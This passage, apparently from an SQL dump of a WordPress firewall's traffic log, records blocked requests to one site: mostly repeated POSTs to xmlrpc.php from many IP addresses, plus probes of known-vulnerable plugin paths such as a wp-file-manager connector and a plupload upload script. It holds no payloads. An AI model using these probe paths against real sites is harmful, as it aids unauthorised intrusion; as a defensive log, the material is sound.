AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3iM2AJZ91SP6zlkU08XBpago',0,1680679448.0859,5064,'','POST',403,0,515,0,1,'',0),('213.152.161.165',3583549861,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZHjncubD6zXMFvKB12wTQE5x',0,1680680771.5771,839,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LBMmE5CS2XcxZOQVNRPTtDlA',0,1680681171.2443,3425,'','POST',403,0,515,0,1,'',0),('84.39.117.57',1411872057,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OG5Ie03EDQlw6xZXnq7TCkpB',0,1680683144.2737,721,'','POST',403,0,515,0,1,'',0),('134.19.179.163',2249438115,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ud2HS6l0FTc58BekiQCxbMsL',0,1680683863.8837,3492,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/plugins/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','ZMXRTJEOVklY9mfjcahsSN1p',0,1680684086.2175,691,'','GET',403,0,700,0,1,'',0),('178.162.204.214',2997013718,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UFdSleRmMwKusoEJa6Qr2WHt',0,1680684323.3432,2292,'','POST',403,0,515,0,1,'',0),('178.162.204.214',2997013718,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rWapOYxvduPZkEl9e4oTyFSh',0,1680684529.6110,635,'','POST',403,0,515,0,1,'',0),('79.142.76.244',1334725876,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tD1WIkZRBGjvahCVK45EwopN',0,1680688055.5792,3614,'','POST',403,0,515,0,1,'',0),('134.19.179.235',2249438187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eHVNBAwYvr4pW167I9sk2tdf',0,1680691124.4608,5587,'','POST',403,0,515,0,1,'',0),('141.98.102.243',2372036339,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DpgJfQAB8sZKbMuOHm7woiSq',0,1680693326.4527,1621,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','PSupvi06bJQaHFkTf9dKY3Zn',3,1680693889.7421,447,'','POST',302,0,600,0,1,'',510),('64.42.179.35',1076540195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XVxCQcNGdwovP3e7mhytDUp5',0,1680694382.5193,585,'','POST',403,0,515,0,1,'',0),('213.152.161.15',3583549711,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UAzLK7oFuSQcNsPGWOHq3Btb',0,1680697873.2838,1081,'','POST',403,0,515,0,1,'',0),('213.152.161.40',3583549736,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6ORyBU0GgDv8iMorhspnjfE4',0,1680701049.4588,3788,'','POST',403,0,515,0,1,'',0),('146.70.76.43',2454080555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3dZiFcG1OlbA0SpB8nwxKQD7',0,1680711222.2688,627,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','yLC4Ef8ZQTsDJOcRiHkbY9uG',0,1680714534.1385,1813,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','ZzsYxRoOn745L13fMBhJqSdv',0,1680714535.1837,1303,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','QrcyjFx0ZOWlhJ91uMtsULD8',0,1680714540.0620,588,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','RFzCIQld1YgjeLBANnXUyO60',0,1680714541.5289,572,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','ns6T1ZS0xDFgoqLzm2dBQiuX',0,1680714549.0986,1057,'','POST',403,0,515,0,1,'',0),('72.167.69.17',1218921745,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XeNg3wkW9YcCDtz61IMyOj5h',0,1680714549.6599,904,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','IwQD35Rmb1kHyrjecJfEWszB',0,1680714554.6941,634,'','POST',403,0,515,0,1,'',0),('43.204.144.128',734826624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','n0RiklDz8QKJwhWeu9FfGLsc',0,1680714561.5145,547,'','POST',403,0,515,0,1,'',0),('64.227.108.223',1088646367,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','K82T7F9s0SnQ3XzNgkVqBGlU',0,1680714572.5858,1583,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','W2vu7Ds6fw5HrUGSBY9Qyg3t',0,1680714573.2431,1373,'','POST',403,0,515,0,1,'',0),('172.105.163.59',2892604219,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','HXuITzh8Qc0kEJOiSaYemqro',0,1680714577.7445,583,'','POST',403,0,515,0,1,'',0),('121.196.63.97',2042904417,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','Jqn80DXaYuWeAFoPiIE3zrNd',0,1680714585.3611,579,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','LsHSGKwJevhbABioZ2R1NIa9',0,1680717228.3021,3273,'','POST',403,0,515,0,1,'',0),('16.162.192.90',279101530,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','my4HbOXtwaTp0ik9JU8ljM3s',0,1680717229.2472,2999,'','POST',403,0,515,0,1,'',0),('129.226.138.214',2179107542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','HCOoqvXdbSIuh9gTBe7UYKN6',0,1680717232.7825,561,'','POST',403,0,515,0,1,'',0),('5.135.7.106',92735338,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','LyJ4TQ5zoGWri7e9bfxOAmFd',0,1680717243.7300,611,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','vknSCXRal4rf3FzJA2dobGsM',0,1680717249.1456,601,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o2OX5WlgJdDrA7yvTMuCspmi',0,1680717252.0315,610,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','mX72W8YsakIZypPC1Uql9MhG',0,1680717260.5073,587,'','POST',403,0,515,0,1,'',0),('47.242.191.83',804437843,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','VlH6DbGIqE9uJ0gcZ3dktrXf',0,1680717266.5582,579,'','POST',403,0,515,0,1,'',0),('192.99.18.63',3227718207,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','nRTU0MacK8x9uymVhq4dbSeO',0,1680717268.0802,578,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','nhA85sXDtyUv0i3ocCr4qLSa',0,1680717272.3635,579,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','FZpv4aDr3mseVohcb1kTKJCn',0,1680717279.7114,596,'','POST',403,0,515,0,1,'',0),('66.248.237.41',1123609897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','utyJ4vw6UNDIhbA8RSz2GasT',0,1680717287.8044,555,'','POST',403,0,515,0,1,'',0),('178.62.61.117',2990423413,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','0DkA1NSMbvQx75wIhd89uLKa',0,1680717292.6659,1477,'','POST',403,0,515,0,1,'',0),('184.75.221.180',3091979700,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OU9FCr4eSosqgnpi53fkuNLR',0,1680717875.3680,2693,'','POST',403,0,515,0,1,'',0),('134.19.179.171',2249438123,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BfQotFrZY6C4VdUhMTKG8LJl',0,1680719054.9762,3873,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Y1Me4L3EwZuimDokzCHOlcbf',0,1680720215.8099,3518,'','POST',403,0,515,0,1,'',0),('185.156.174.27',3114053147,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','y5on8GgvxVRPXs2D9SdeuOpz',0,1680720852.8215,4493,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','8ICxMf27LHqFJrTkc5ozEDyn',0,1680720944.6070,2134,'','POST',403,0,515,0,1,'',0),('128.199.90.99',2160548451,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','dNuI32l8U1jYnyDT7ofq5JOx',0,1680720945.2656,1888,'','POST',403,0,515,0,1,'',0),('103.139.1.249',1737163257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','82SzM4WEUR1Ka97bZjHOGXsJ',0,1680720946.6409,1237,'','POST',403,0,515,0,1,'',0),('173.214.170.82',2916526674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','3E1cIgNvQoPK6l8wTex2UDm4',0,1680720952.7927,555,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','mI1NDoEp02VxiWeXhHq7JZMG',0,1680720956.5746,567,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','qSE8y9efVPXKUG3nZbIBMkiJ',0,1680720961.0725,557,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','QCJR5nLtN4zXv1aYhkcAfBZI',0,1680720971.0277,551,'','POST',403,0,515,0,1,'',0),('45.195.25.73',767760713,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','So7M6IKGRzacwBt0h4QVWZAy',0,1680720992.1149,545,'','POST',403,0,515,0,1,'',0),('178.18.244.71',2987586631,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','w7sbXev0SCBGNL4gAyrkWZV2',0,1680720995.4314,541,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zetLfsQu2OSAlTq9Myiv60Ew',0,1680721010.8347,561,'','POST',403,0,515,0,1,'',0),('185.98.5.146',3110208914,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','DMF1ZXiwQrSTx65ONPoK2HBj',0,1680723178.0731,3990,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','jUh1dk2BC8YxFKayQH06fW4v',0,1680723180.9017,1482,'','POST',403,0,515,0,1,'',0),('202.172.28.11',3400277003,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JVIZM9bsh1WyqxRF0iLU3mA5',0,1680723188.7312,591,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','gCq6beQacM7TGXJDU0uvOf3H',0,1680723192.1298,562,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','nK3qdGhPMacreXBNvTSsR25j',0,1680723196.3221,582,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','8cSGx0TfJmeHaNYMUw3qVQK9',0,1680723204.5057,574,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','sioFwzh7XlBRMvSfG6QJWLTr',0,1680723205.9553,554,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','YtGC3Nji0zLdrOEk6QuZ7ST4',0,1680723213.2101,569,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','m2vDZubV5w0LWxd3yfgASRzo',0,1680723214.0084,576,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://mail.cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/109.0.0.0 Safari\\/537.36\"}','k1JuYAFwEzDHCh3m8LeS5oGB',0,1680723328.3459,324,'','GET',403,0,700,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','uyJMebptOCTohr5VKSvPW9s1',0,1680724185.0438,4273,'','POST',403,0,515,0,1,'',0),('188.165.91.210',3164953554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','9QK5GjmBZzPnDwYd7Mo0Hv42',0,1680724194.9101,1274,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','o0g1QaY4KiFEdzBhLMusTvZk',0,1680724201.2493,581,'','POST',403,0,515,0,1,'',0),('35.195.46.200',599994056,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','xzl5qy46hCVjXD3FiOoMZRpe',0,1680724202.0030,921,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','P9DJFp7IUilGt1MyCdOafEcK',0,1680724212.0604,573,'','POST',403,0,515,0,1,'',0),('51.144.123.73',865106761,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','jIgtWrT96Rkhsmy1wqFu0Qzx',0,1680724213.8768,587,'','POST',403,0,515,0,1,'',0),('140.174.6.37',2360215077,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','smx4qrBpzROV65HaZFU9yfPw',0,1680724228.6609,590,'','POST',403,0,515,0,1,'',0),('209.58.173.138',3510283658,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','POCtlfFr9WTIXoEj5vyAkpZG',0,1680725238.3139,3940,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ya3wAfubXTt9dKLRqO1BsmnN',0,1680726144.9021,1409,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','84rYJpB5oMGIzOVj1Eite9UX',0,1680726144.4470,2217,'','POST',403,0,515,0,1,'',0),('188.225.21.131',3168867715,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','4tsVgouUOx1D2w9vIXq8ZWNe',0,1680726148.8091,1240,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','U8betOkuNZLzKnPGWyjgCA5J',0,1680726149.0817,1162,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','k9gGmfwM74JaOHhY6Al15VnW',0,1680726151.8148,562,'','POST',403,0,515,0,1,'',0),('85.126.154.26',1434360346,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','pCsZW7ltKhJQ90Sw2iHPBEnk',0,1680726165.7623,539,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','h582VUa9ctDYm7f6elJE4jqo',0,1680726174.6327,565,'','POST',403,0,515,0,1,'',0),('51.195.105.117',868444533,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','Im0pr6LCgFyjOND7VHET1Gk5',0,1680726179.7677,572,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','gbR9D4JhOaNHwe3Xx05rIstA',0,1680726185.7416,592,'','POST',403,0,515,0,1,'',0),('111.231.4.211',1877411027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 